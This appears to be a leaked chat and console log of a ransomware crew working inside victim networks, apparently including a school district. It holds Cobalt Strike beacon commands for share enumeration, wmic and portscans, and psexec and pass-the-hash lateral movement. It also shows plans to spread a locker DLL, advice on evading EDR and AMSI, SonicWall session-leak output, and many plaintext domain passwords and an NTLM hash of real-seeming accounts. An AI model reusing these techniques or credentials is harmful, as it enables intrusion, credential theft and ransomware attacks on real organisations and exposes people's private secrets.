[*] Tasked beacon to run: net view \\10.0.53.26\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \\10.0.53.26\
Share name Type Used as Comment
-------------------------------------------------------------------------------
dump Disk
engrade Disk
Import_Services Disk
SMDIM Disk
VT_Integration Disk
The command completed successfully.
beacon> shell net view \\10.51.200.121\
[*] Tasked beacon to run: net view \\10.51.200.121\
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
``They're only available.
beacon> shell net view \\10.0.61.61\
[*] Tasked beacon to run: net view \\10.0.61.61\
[+] host called home, sent: 53 bytes
[+] received output:
Shared resources at \\10.0.61.61\
Share name Type Used as Comment
-------------------------------------------------------------------------------
Scann Disk
The command completed successfully.
``but without /all look + did you look through net view /all?
beacon> shell dir \\10.0.61.61\E$
[*] Tasked beacon to run: dir \\10.0.61.61\E$
[+] host called home, sent: 50 bytes
[+] received output:
The network name cannot be found.
``can you see the dir? no, we pull what's pulling, C only? no, besides the other mappings?
Status Local Remote Network
-------------------------------------------------------------------------------
OK Q: \\10.210.0.51\C$ Microsoft Windows Network
OK R: \\10.210.0.42\C$ Microsoft Windows Network
OK S: \10.210.0.42C$ Microsoft Windows Network
OK T: \10.210.0.62$ Microsoft Windows Network
OK U: \\10.210.0.41\C$ Microsoft Windows Network
OK V: \\10.210.0.61\C$ Microsoft Windows Network
OK W: \10.0.51.84$ Microsoft Windows Network
OK X: \\10.0.53.24\C$ Microsoft Windows Network
OK Y: \10.210.0.52$ Microsoft Windows Network
OK Z: \\10.0.61.69\N$ Microsoft Windows Network
The drive is a letter, i.e. net use A: \\host\c$ do you map it to letters? this one has disks - yes ``
beacon> shell net use * \\10.0.61.61\C$
[*] Tasked beacon to run: net use * \\10.0.61.61\C$
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
``` ```
Shared resources at \\10.0.61.61\
Share name Type Used as Comment
-------------------------------------------------------------------------------
ADMIN$ Disk Remote Admin
C$ Disk Default share
E$ Disk Default share
G$ Disk Default share
I$ Disk Default share
IPC$ IPC Remote IPC
M$ Disk Default share
P$ Disk Default share
Q$ Disk Default share
R$ Disk Default share
Scann Disk
T$ Disk Default share
The command completed successfully.
``
ad_computers.txt:7592: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:7641: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:7690: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:826378: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
ad_computers.txt:1560647: >memberOf: CN=HyperV Clusters,OU=HyperV,OU=Servers,DC=admin,DC=sisd,DC=k12
I see that these are mapped? and which are not mapped; it seems to be part of the cluster - there is simply replicated data, check.... and this one is mapped?
HyperV-Dell01.admin.sisd.k12 ``consistently.''
[*] Listing: \\10.0.61.69\N$\shared\
Size Type Last Modified Name
---- ---- ------------- ----
dir 03/09/2015 09:03:16 $RECYCLE.BIN
dir 11/17/2017 08:39:57 amh
dir 01/16/2020 14:13:59 BPA
dir 01/16/2019 16:49:23 BPA Teacher
dir 11/14/2019 13:03:31 CTE
dir 03/09/2015 09:05:42 ech
dir 10/15/2019 12:54:42 ED9
dir 04/03/2017 14:12:52 edh
dir 09/09/2015 09:02:26 ELH
dir 03/09/2015 09:12:02 files
dir 11/19/2019 09:28:51 GoVenture
dir 03/28/2016 14:48:04 key
dir 03/09/2015 09:15:51 moh
dir 03/09/2015 09:16:05 most2003
dir 03/09/2015 09:16:31 oph
dir 03/09/2015 09:16:35 PharmExam
dir 09/09/2015 09:24:12 Profile
dir 04/06/2017 10:44:18 software
dir 09/09/2016 09:28:04 soh
dir 03/09/2015 10:55:17 System Volume Information
dir 03/09/2015 10:55:17 vBusiness
``and shared
[*] Listing: \\10.0.61.69\N$\
Size Type Last Modified Name
---- ---- ------------- ----
dir 05/05/2020 14:45:23 $RECYCLE.BIN
dir 12/10/2018 09:34:11 Backup Agents for Cluster Groups
dir 02/19/2019 08:08:46 Program Files
dir 01/16/2019 16:34:55 shared
dir 12/07/2020 19:04:06 System Volume Information
``give me a listing of this directory N$; do not see disks; they are not mapped, no shares ```
Av-CNS-HyperV: 10.0.53.210
Av-HyperV-Dell1: 10.0.53.250
Av-HyperV-FX2-1: 10.0.53.193
Av-T-HyperV: 10.0.53.238
``I poked at random; what if yes - all the folders inside the N$ contain all the folders that are ``next to it``?
beacon> portscan 10.0.61.69 445,135,139
[*] Tasked beacon to scan ports 445,135,139 on 10.0.61.69
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '10.0.61.69' is alive.
[read 8 bytes]
10.0.61.69:139
10.0.61.69:135
10.0.61.69:445 (platform: 500 version: 10.0 name: NAS2 domain: ADM)
``no need for that; there are almost no handhelds on workstations; Cobalt can't handle 1k sessions. already wrote it down. so what? @user8 please give me access to Cobalt privately where you have a session with the DA token
beacon> shell net view \\10.0.61.69 /all
[*] Tasked beacon to run: net view \\10.0.61.69 /all
[+] host called home, sent: 57 bytes
[+] received output:
Shared resources at \\10.0.61.69
Share name Type Used as Comment
-------------------------------------------------------------------------------
amh Disk
BPA Disk
CTE Disk
ech Disk
ED9 Disk
EDH Disk
ELH Disk
files Disk
GoVenture Disk
IPC$ IPC Remote IPC
KEY Disk
MOH Disk
most2003 Disk
N$ Disk Z: Cluster Default Share
OPH Disk
PharmExam Disk
Profile Disk
shared Disk
software Disk
SOH Disk
vbusiness Disk
The command completed successfully.
shell net view \\10.0.61.69 /all, right, that's what I mean)) like a variant without a drop to disk
beacon> shell wmic /node:10.0.61.69 os get name
[*] Tasked beacon to run: wmic /node:10.0.61.69 os get name
[+] host called home, sent: 64 bytes
[+] received output:
Name
Microsoft Windows Server 2016 Standard|C:\Windows|\Device\Harddisk0\Partition2
``To bypass the avne spread and inject the locker dll into the current beacon process; as I understood, the new script will spread the build across all the sessions open in Cobalt. So maybe it's better to pull the workstations into Cobalt and not mount them? or the nix server? and you're sure it's Windows at all?
Shares for 10.0.61.69:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
amh
BPA
CTE
ech
ED9
EDH
ELH
files
GoVenture
KEY
MOH
most2003
N$
OPH
PharmExam
Profile
shared
software
SOH
vbusiness
******* COMPLETE *******
``or wmic net view?
beacon> shell wmic /node:10.0.61.69 logicaldisk get description,name
[*] Tasked beacon to run: wmic /node:10.0.61.69 logicaldisk get description,name
[+] host called home, sent: 85 bytes
[+] received output:
Description Name
Local Fixed Disk C:
Local Fixed Disk F:
Local Fixed Disk N:
``` ```
beacon> shell net use * \\10.0.61.69\C$
[*] Tasked beacon to run: net use * \\10.0.61.69\C$
[+] host called home, sent: 56 bytes
[+] received output:
System error 53 has occurred.
The network path was not found.
```
:thinking: Is this what we have? Example `execute-assembly /home/user/TOOLS/SharpSharesNG.exe shares DMZ-HyperV`
```
/*
 * SharpSharesNG --max-threads 10 --output console|/path/to/file
 *
 * ips - equiv ips ad
 * ips 10.0.0.1 [--os-detect] [--alive]
 * ips 10.0.0.1/24 [--os-detect] [--alive]
 * ips HostName [--os-detect] [--alive]
 * ips [ad] [--os-detect] [--alive]
 * ips [list] c:\users\hostlist.txt [--os-detect] [--alive]
 *
 *
 * shares - equiv shares ad
 * shares 10.0.0.1 [--os-detect] [--public-only]
 * shares 10.0.0.1/24 [--os-detect] [--public-only]
 * shares HostName [--os-detect] [--public-only]
 * shares [ad] [--os-detect] [--public-only]
 * shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]
```
So you'll have about 2k matched workstations and then let's map the workstations 10 per server. Now the goal is to map the rest of the servers, all their network drives, and leave them untouched except for the DC and DNS servers.
SISD-SQL: 10.0.61.70 -
SISD-SQLFC: 10.0.61.73 -
NAS: 10.0.61.80 -
HYPERV-DELL01: 10.0.53.240 -
HyperV-FX2-01: 10.0.53.199 - -
CNS-HyperV: 10.0.53.200 - -
ESPAPP1: 10.0.53.52 - -
SCHOOLBO: 10.0.254.4 - -
ESPTSK3: 10.0.53.58 - -
ADM-CCRP: 10.0.254.3 -
``` all network drives on the current servers are mapped; the rest of the servers are mapped. now do this, it's like this: 222 of 277 servers are mapped? how many servers in total are mapped? where no session, is it mapped? if pipe, nothing is mapped; if regular dll`` ``.
Shares for CAUSQLCL8wx:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ClusterStorage$
******* COMPLETE *******
``Where ??? there either ``` The network name cannot be found. ``` or ``` The network path was not found. ``` it gives out after a while; the change of creds didn't help ``pipe netjump no`` ``
- MY-SISD-NFS: 10.0.61.61 ?
- VIDEO-SOH: 10.13.200.122 ProcessId = 19316; ReturnValue = 0;
- VDI-PVS: 10.210.0.40 ProcessId = 8176; ReturnValue = 0;
- STU-HOME: 10.0.61.57 ?
- T-HYPERV: 10.0.53.230 ???
- SESROEVIDEOSVR: 10.116.200.121 ???
- RIERHM-VIDEOSVR: 10.58.200.121 ???
- SQLCLUSTER: 10.0.53.25 ???
- VDI-PVS01-2: 10.210.0.51 ProcessId = 9912; ReturnValue = 0;
- STU-SERVER: 10.0.50.1 ???
- VDI-PVS02-1: 10.210.0.42 ProcessId = 6424; ReturnValue = 0;
- VDI-XD02: 10.210.0.62 ProcessId = 8956; ReturnValue = 0;
- VDI-PVS01-1: 10.210.0.41 ProcessId = 12324; ReturnValue = 0;
- VDI-XD01: 10.210.0.61 ProcessId = 7988; ReturnValue = 0;
- NPM-01: 10.0.51.84 ProcessId = 16948; ReturnValue = 0;
- CAUSQLCL8wx: 10.0.53.24 ProcessId = 9300; ReturnValue = 0;
- VDI-PVS02-2: 10.210.0.52 ProcessId = 1764; ReturnValue = 0;
- VDI-PVS02: 10.51.200.121 ?
- TylerSISCluster: 10.0.53.26 ???
- CATE-NAS: 10.0.61.69 ???
??????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????
Shares for Av-DMZ-HyperV:
[--- Unreadable Shares ---]
IPC$
``````
VERSASQL: 10.0.53.98`
``Arrived under other creds? no, from another server under other creds - everything is the same; now I will try another one... by the way, as far as I see there is a lot about Hyper-V... these servers hold images - if you don't deal with them, the network is likely to recover in one click. is it out of my 55 not mapped? is it out of 200?
```
EDHF-SPED: 10.0.61.226
STU-YEARBOOK: 10.0.50.222
ADM-TECH1: 10.0.51.104
Av-CNS-HyperV: 10.0.53.210
CAUSQLCL8wx: 10.0.53.23
Av-HyperV-Dell1: 10.0.53.250
Av-HyperV-FX2-1: 10.0.53.193
Av-T-HyperV: 10.0.53.238
Retired-VMs: 10.0.51.97
WAC: 10.0.61.75
check if another host is pinging on this IP, which may be cluster storage that has the same IP as the "normal" server. what is the overall progress? ok, check from another point; it does not even have admin$; change the server and accesses; you have looked from one server, how are the shares? try from another point. no sessions arrived, the delta is loaded, what to do? if the server only ``t
Shares for DMZ-HyperV:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
ClusterStorage$
``````
FINIIS1: 10.0.53.109 000
ESPTSK2: 10.0.53.57 000
RPTNET1: 10.0.53.60 000
ESPAPP4: 10.0.53.55 000
ADM-LASON: 10.0.51.63 000
VERSASQL: 10.0.53.98 000
ENSOR-HORIZON: 10.206.56.121 000 000
ADM-CARDACCESS: 10.0.51.61 000
ADM-XPEDITER: 10.0.51.45 000
ESPSQL1: 10.0.53.51 000
ESPAPP2: 10.0.53.53 000
CMP-TCH-51-60: 10.0.51.60 000
ADM-KMS: 10.0.61.87 000
ESPTSK1: 10.0.53.56 000
``when jumping, a regular psexec is sometimes more effective, not only psexec_psh; it's pretty solid; where it doesn't start, you can try it with pipes
+ SISD-SQL01: 10.0.61.71
+ VDI-PROFILES: 10.0.61.20
+ T-HYPERV01: 10.0.53.231
+ HYPERV36: 10.0.53.247
+ SISD-SQL02: 10.0.61.72
+ EDHSVIDEO: 10.206.16.121
+ CTE-STORE01: 10.221.1.31
+ HYPERV22: 10.0.53.202
+ MONITOR: 10.0.51.78
+ BSE1-VIDEOSVR: 10.118.200.121
+ NOC-MASTER: 10.210.224.29
+ DWEVIDEOSVR: 10.120.200.121
+ DHCP01: 10.0.51.4
+ AHS-VIDEO: 10.11.200.121
+ VDI-SF01: 10.210.0.63
+ SCVMM: 10.0.254.69
+ HYPERV35: 10.0.53.246
+ DHCP02: 10.0.51.7
+ HYPERV34: 10.0.53.245
+ RIGHTFAX: 10.0.51.82
+ CTE-SQL01: 10.221.1.121
+ NOC-EX7: 10.210.224.74
+ HYPERV33: 10.0.53.244
+ HYPERV21: 10.0.53.201
+ HYPERV31: 10.0.53.242
+ HYPERV32: 10.0.53.243
+
HYPERV23: 10.0.53.203
+ HYPERV24: 10.0.53.204
+ CNS-HYPERV02: 10.0.53.212
+ T-HYPERV03: 10.0.53.233
+ T-HYPERV04: 10.0.53.234
+ HYPERV25: 10.0.53.205
+ VDI-SQL-01: 10.210.0.1
+ MMSVIDEOSVR: 10.52.200.121
+ JCEVIDEOSVR: 10.130.200.121
- MY-SISD-NFS: 10.0.61.61
- VIDEO-SOH: 10.13.200.122
- VDI-PVS: 10.210.0.40
- STU-HOME: 10.0.61.57
- T-HYPERV: 10.0.53.230
- SESROEVIDEOSVR: 10.116.200.121
- RIERHM-VIDEOSVR: 10.58.200.121
- SQLCLUSTER: 10.0.53.25
- VDI-PVS01-2: 10.210.0.51
- STU-SERVER: 10.0.50.1
- VDI-PVS02-1: 10.210.0.42
- VDI-XD02: 10.210.0.62
- VDI-PVS01-1: 10.210.0.41
- VDI-XD01: 10.210.0.61
- NPM-01: 10.0.51.84
- CAUSQLCL8wx: 10.0.53.24
- VDI-PVS02-2: 10.210.0.52
- CLARKE-SVE: 10.51.200.121
- TylerSISCluster: 10.0.53.26
- CATE-NAS: 10.0.61.69
``The servers do not overlap? yes, see these two puffing. The second river is flowing 185....113; the first is mine and user7's, and what is the second Cobalt? we are each 55 pieces and in 2 Cobalts; work out the first 200? there is one Cobalt empty; 50/55; I have about 50%; what is the overall progress? and the second?
[+] Looking for RADIUS domain creds
[+] Found radius domains, parsing
[!]
Found radius domain creds [+] aDfoj344*#l2eh2@192.168.188.64 [+] Parsing bookmarks [+] Found bookmarks, Hunting for creds [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 24, 'name': 'PNGC-ACCTRDS-01 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-01.pngc.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 24, 'name': 'PNGC-ACCTRDS-01 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-01.pngc.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 25, 'name': 'PNGC-RDS-01 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-RDS-01.pngc.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 25, 'name': 'PNGC-RDS-01 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-RDS-01.pngc.com'} [**] Found bookmark with creds [+] Found bookmark {'name': 'PNGC-ACCTSQL-01 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.96'} [**] Found bookmark with creds [+] Found bookmark {'name': 'PNGC-ACCTRDS-01 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.97'} [**] Found bookmark with creds [+] Found bookmark {'name': 'PNGC-ACCTSQL-02 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.129'} [**] Found bookmark with creds [+] Found bookmark {'name': 'PNGC-ACCTRDS-02 (Support)', 'username': 'dynamics.support', 'password': 'Oragne85Taco', 'service': 'RDP', 'host': '192.168.188.128'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user 
{'userGroupID': 44, 'name': 'PNGC-ACCTRDS-02 (Single Monitor)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-02.pngc.com'} [+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user {'userGroupID': 44, 'name': 'PNGC-ACCTRDS-02 (Dual Monitors)', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'PNGC-ACCTRDS-02.pngc.com'} `````` [+] Checking URL https://205.236.0.43 [+] Found old SMA version (<9.x) [+] Appliance running version 9.0.0.9-26sv [+] Leaking sessions to dump configuration. [+] Attempting to dump sessions from https://205.236.0.43 [+] Found: SessionID: 1Ao1qakSkqZUQ1Yg1r1V8Z0n7l7l7axQdQUQAH4HgrtHQ= userType: 1 userName: abarter Password: warrenwitches Domain: pngcdomain [+] Found: SessionID: O1DgDOf7kN2aFj18o7YPpz4hRCEUQj16ekh8Z18qBFE= userType: 1 userName: ajackson Password: tessakitty0625 Domain: pngcdomain [+] Found: SessionID: UkvbkafqdnyTOwAHibeL3GQY4Uy31VVdg8h0jqldA1g= userType: 1 userName: mdonovan Password: FUH@ck3rs! Domain: pngcdomain [+] Found: SessionID: b1CAsgAi6GwDG5Ab6yC9Z0Xj9cbl5axwogMpNoWpu24= userType: 1 userName: tstubblefield Password: LordofLords2 Domain: pngcdomain [+] Done with https://205.236.0.43, found 4 sessions These? leeandmason.com L&M Domain 107.0.14.250 tl 127kk STOPPED 2fa need hot sessions `````` pngc.com pngcdomain 205.236.0.43 user4 238kk STOPPED no valid accounts ``The first one is actually a town of some kind. Why them? Can I have these rewritten, please? madison.il.us gisnet1 71.14.246.203 redwoodcity.org redwoodcity.org 76.14.0.148 canalbarge.com canalbarge 50.233.57.77 ``I've got about an hour and a half here for sure, I've got about 30 minutes to start thinking,`` I've got 2fa somewhere if you need it,`` no luck yet? 
the tech guys should be studied in any case, for access to ESXi or other virtualization, and generally juicy data in the form of backup regulations, network maps and the like. 9 of 10 what will there mfat will hit in the Carbon cloud; well, the technicians' browsers is a bit of a wanker, i understand, but speaking of Carbon, there are cases where the execution of any PowerShell code in the network, for example, is perceived by Carbon policies as an alert and sends a note to the admins. Find the creds from Carbon =) well then let's start with the "task", what's the priority right now? i think the study of the technicians' machines; it's probably the usual no-jouz, copying files, psexec_command is quite a realistic solution. So why "go" on the net? you have segments that you can not see? i do not quite understand how to go on the net. Look at it as a useful practice, "silent" work; otherwise there is no way =( the fewer tasks/rundll/unsigned exes and the like, the better; then alas, Carbon writes any anomalies, not only malware but also not just "out-of-the-box" injects; it's a cloud SOC. I think not. @tl1 have we started a dll here at all? if not - you can try PowerShell payloads for protection functions. Carbon, even though EDR, has a greater focus on whitelisting and account control. if you are ready today to urgently hack work on this network - I do not see the criminal in spreading the dll. To see processes, do not watch remotely. It is everywhere that you should not even try to slug the dll? nptywtf `SUDIGYFSDO^F&W67rfuSYRG^U67HGH` so you do not have dns and ldap, anything in the domain + you do it from the dedicated servers?) give your AD; I have it removed in zeroinds; better not touch, there is most likely a detector on ntdsutil; AD better reset; I clearly; obsolete server without cb.exe in processes, there will be a chance to jump into the network; there is Carbon` EVO\radmin 3v0r3port` sure it's valid``.
Get list of DCs in domain 'evo.local' from '\\AZ-DC-2.evo.local'.
CHEECH.evo.local [DS] Site: HQ2
AZ-DC-2.evo.local [PDC] [DS] Site: evoAZURE
HQ-DC-2.evo.local [DS] Site: HQ2
HQ-DC-1.evo.local [DS] Site: HQ2
AZ-DC-4.evo.local [DS] Site: evoAZURE
========================================================================
[*] EVO\Administrator
[*] EVO\Administrator Tmpl
[*] EVO\bduong
[*] EVO\bkruse
[*] EVO\bplehal
[*] EVO\bpratt
[*] EVO\cbbackup
[*] EVO\ceaton
[*] EVO\dhcpreg
[*] EVO\evoadmin
[*] EVO\hdryden
[*] EVO\iso Reset123
[*] EVO\isoutsource
[*] EVO\jcourtney May12011
[*] EVO\landerson
[*] EVO\lsoto
[*] EVO\MerakiVPNSrv
[*] EVO\mgentry
[*] EVO\nkiger L1m3_Gr33n
[*] EVO\qlyons
[*] EVO\radmin 3v0r3port
[*] EVO\sborn
[*] EVO\SBS Backup User
[*] EVO\searle
[*] EVO\ServerAdmin$
[*] EVO\spiceworks
[*] EVO\svc_mechanic
[*] EVO\SVC_PRTG
[*] EVO\svc_sqlmnt
[*] EVO\svc_sqlslave
[*] EVO\tadmin evo123 - disabled
[*] EVO\tfield
[*] EVO\tmusselwhite Guide12319
[*] EVO\ups
[*] EVO\veeam_vss
[*] EVO\vipreadmin
[*] EVO\vpnadmin
========================================================================
[*] Found users in enterprise admins
[*] \Administrator
[*] \iso
[*] \isoutsource
[*] \jtizon
[*] \manuelw
[*] \MerakiVPNSrv
[*] \nkiger
[*] \qlyons
[*] \sborn
[*] \ServerAdmin$
[*] \vipreadmin
========================================================================
scanuser abc123$ - VALID FOR DC
C:\Windows\system32> net localgroup "administrators"
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Administrator
EVO\Domain Admins
Roscoe
The command completed successfully.
``To minimize PowerShell, a huge C# toolkit was built specially for you; dotnet does not trip AMSI and is not watched the way PowerShell is; please stop using PowerShell as much as possible where you can make do with dotnet. blin, yeah.... I mean SharpView, not PowerView. stop what invoke?
I've already written about both VPC and PowerShell; we'll find the logs from Misha, we started with him today; it seems to output all in a row, just invoke-uchuchuchtuchtuchtuchtuchtuchtuchtucht; if the user is not set, then it looks like something searches for his error, kicks out; how so? SharpView does not search? do not look (SharpView knows how to find the users too? super! Yes, you have SharpSniper? hence it should "be able" to read them because it accesses domain controller logs, and you have to run it only from domain admin context; try SharpSniper; it's a good time to test it) we were looking for something like this, i think we found it on PowerShell; search for keywords like network, admin, tech, etc. and allocate them from ad_users and use this tool to find their PCs where there will be valuable information about the network, just the same should be information about EDR, backups, etc.; in the problem "search for technicians" it actually helps find PCs assigned to users; gave you this stuff? ``` https://github.com/HunnicCyber/SharpSniper this is how you check if the current credentials are rolling on the remote PCs: make yourself a token of LA for the supposed machine; second - respectively from cmd through >shell @tl2 prompted you) or wmic /node:10.225.10.200 process briefs \\10.225.10.200\c$ test; the easiest way to check access to the file system 1) will not be better - because similarly a dirty load will be generated. Good friends, please. We now and in the future will be very often confronted with VPNs.
I remember them as a whole +- by heart on the config and everything else, but in order to make it more convenient for everyone - please make a separate thread on the forum, where VPN installers will lie, guidance on finding VPN config files on different operating systems, and other things related to this type of access, to the same ``` jump psexec64 10.225.10.200 https ``` pre-generates a dirty binary that could trick even a regular WinDef; such attempts are almost guaranteed to create a security event - how to check here?) I think you already know what to check this way: ``` jump psexec64 10.225.10.200 https ``` wrong, because this token might not get access at runtime by itself; use primitive tokens, which only fail if access is wrong, or use make_token ```. pth datacenter.local\adm.brodan0 06290576382001cd1da4c942e9fa0ca6 ``I'll repeat the last time: let's get the passwords out of the vannott and move on to the eighth 2 1 or where is it from? they also have DA?) typo, ninth) chetu.com dom.helpathome.com + found the "silent" servers? dom.helpathome.com - @user9 and @user1; saiglobal.com - @user8; @user4 finish his (check.on.com), then joins saiglobal.com; firedi.com @user8 domain? he'll do it; @tl1 pass saig to @user8; then me and @user1 finish mine; was 6 people - 3 networks) he's a priority too, and finish them both to myself in dom.helpathome.com) but @user8 says no sessions to him, which one of you is lying? it's for the future, when you make a listener for a pass you specify it + 443 port; there the domain saw beacons at https?):wink: where does it go where? When you do `spawn misha` pass - pass it to the domain? by the way + and notice that there the ip is different and not the one you connect to, right, do you see?
Open it and look at your HTTPS. Nobody even looked at their listener in the Cobalt.) You asked the Cobalt where the sessions are? Pass what domain? That's the Cobalt's IP, and I need a domain; different domains see different trusts. From 19, still enough of the colleagues above.) There are two of them, right? What trusts are there? .161.126.162 gotovkobu. Where to pass the session, or work from those that remained? From there we need to do the other trusts + AD + AV + backups, then allocate one person to saiglobal.com. Everyone on the dedicated server, everyone without a case now? The dedicated server rebooted. Write please how many trusts there are in the domains. domains.helpathome.com happay.inn. So please tell me what networks are up and running now? @user8 where are you going? Yes, all the groups? sec) + @tl1 add me to them here. Add me to the confines of Stalinymm, and one that did not fly there; not everything is so simple. Three in process; until you can fall onto the first two, to the others; the third is still waiting? Still, a session has arrived, possibly) or it has not yet connected) but it seems to have disconnected from the domain (yes, I am working with it now; my yesterday's red one, do not touch it) + 1 + that DC-01 and this session are one network? Strange thing. d1 came) yesterday's sessions or yesterday's?
Either pass each other the sessions in the Cobalt, or give access to a partner; there, as conveniently as possible, take one for two. Three pcs are expected. In both eyes :flushed: OK, monitor yesterday's Cobalt. Friver.local two sessions, very hovering. Are any sessions alive? So good :sleeping: Good morning) Good afternoon :space_invader: Cheerful morning) Quiet night. Thank you all for today. The important thing is that the mistakes are passed and the result is there. Well done, and took two DA. To tomorrow. Messed up with the VPS and dedicated servers) Until today, to tomorrow. Today the total time is already very much, let's finish. So a good option is to look for your own and check the LPE we have on the network services; we check them in the case, in situations to sort out theoretically, up to searching for the name of the admin's dog as a password) Well, and if it did not pass?)) Uploaded to the archive, which was in the requirements for the report. The situation is theoretical) ftp exploit questions. Almost all of us today do not have users, LA, no creds (nowhere at all). Going up does not work; logically we need to scan the network, look for 7/XP/SQL and so on, and exploit them. Let's say the Kerb is still uncrackable. Keyloggers, fake logons.... Anyway I might have missed something, but that's pretty much it. What other interesting things can be done in such a situation? So, all uploaded files with AD and other things? Yes, I checked on 4 phones at home; it does not work on any of them. Tomorrow by 15. Who does not know vpinp.net.
```
User is not LA
creds from browsers
AD info
Checked the non-AV test domain
Got the LA\DA\EA lists
sitifno ran the dll
Checked files on the machine that contain passwords.
Checked ad_computers for passwords.
trying to raise permissions (2020-0796)
mimikatz value::creds
session crashed
```
We've got a Telegram that's not working.
helpathome.com
```
The user is not LA
browsers creds
AD info
Checked the non-AV\test domain
Got the LA\DA\EA lists
sitifno ran the dll
Checked files on the machine that contain passwords.
Checked ad_computers for passwords.
trying to raise permissions (2020-0796)
Share-Finder (process died)
GPP-Pass
Invoke-Kerberoast
mimikatz value::creds
Ping machines in the domain
Portscan to standard ports
session crashed
session is back
kerb hash reset - started to check for validity
checked user - yes, password has not changed for a long time
tried to check validity via net use - got syntax error
session crashed
```
@user7 didn't you get a session? Collected information from the machine: AdFind, Seatbelt, SharpWeb, Rubeus kerb, Invoke-Kerberoast, tried GPP (found nothing), went through the folders. Went from ad_computers to Windows 2003 and HP. Pinged them and made a list. Alexei connected, and on one of the Win 2003 machines he brought up SYSTEM with the DA credentials, uploaded the DLL and started it. Took hashes from the DC. Started to complete the list of servers, decided to make life easier with a light script and fakal doc over which I sat all this time. As I got AD info, there were groups; the current user is not in them. Has anyone had such a situation with LA as I described? That there is no direct reference to the current user, but there are other groups?
Received session:
UserName: forstern (not a local admin)
HostName: SHO-LT-4726W10
Domain: bnpmedia.com
Got it:
AdFind
DCs DA EA LA (SHO-LT-4726W10)
SeatBelt
WinPeas
Kerb-hash (Rubeus)
1 password from browser (SharpWeb) for MSOutlook
It didn't work:
CVE-2020-0796 - session in system context did not spawn, no error
Net-GPPPasswords.exe - it ran, it did not give any creds
Invoke-Kerberoast.ps1 - gave an error that there were no users for kerberoast
smb_login - ran the MSOutlook password on the current subnet, no machine came up
SharpChrome - did not give out any creds
Did not have time:
MS_17_010 - Built OS: Windows XP, 7, Server 2003, 2008; had time to ping not all, planned to run ms_17_010_psexec on those successfully pinged.
Also sorted the servers into groups.
OpenVPN and ScreenConnect configurations were found on the computer. OpenVPN could not be deployed on the hard disk.
```
CHETU.COM
Unchecked AD info taken off
net accounts /dom
net group "domain admins" /dom
net group "enterprise admins" /dom
Took off the Invoke-Kerberoast output and gave it to the brute force
SeatBelt + winPEAS
SharpChrome - pulled out 10 passwords that fit the length of the domain requirements.
Raising privileges did not work, in spite of the not updated Windows
From ad_computers I checked out the server computers and added pings to the list.
Found a backup file OneNote passwords.one (On 8-27-2020).one on the system.
Prepared a list of interesting files on the FS (unattend and office docs)
```
Just the first line in the message with the "report" name: conf/config, to know where the situation is. Write immediately on what network, please.
```
harrau.in
1) Took off the browser creds: Chrome and then all the rest
2) Took off AD_Users
3) Took off DA
4) Took off local
5) Took off mimikatz
6) Collected password files
7) Half-dawned the 2020-0796 system
8) Started looking at the network for further movement
9) Sorting data
10) Preparing reports
The connection is lost.
```
```
friver.local
Helping User7
1) Checked subnets
2) Chose a subnet, checked for MS17; found one machine, threw the session into Armitage
3) Took off hashdump and mimikatz.
4) Found DA.
5) Got a dump from DS.
```
Peculiar exchange of experience) Suddenly someone will have good thoughts on the problems of another. Let everyone understand the situation on the networks; write directly here. Where to write? For each of your networks write an overall score for today: what's up, what's done, what worked, what did not work, questions. Let's probably summarize the results today. It seems the search is too long; missed the opportunity to try that other Cobalt `s? AHyHax beacon> spawn https `` And the uses? For convenient and comfortable work.
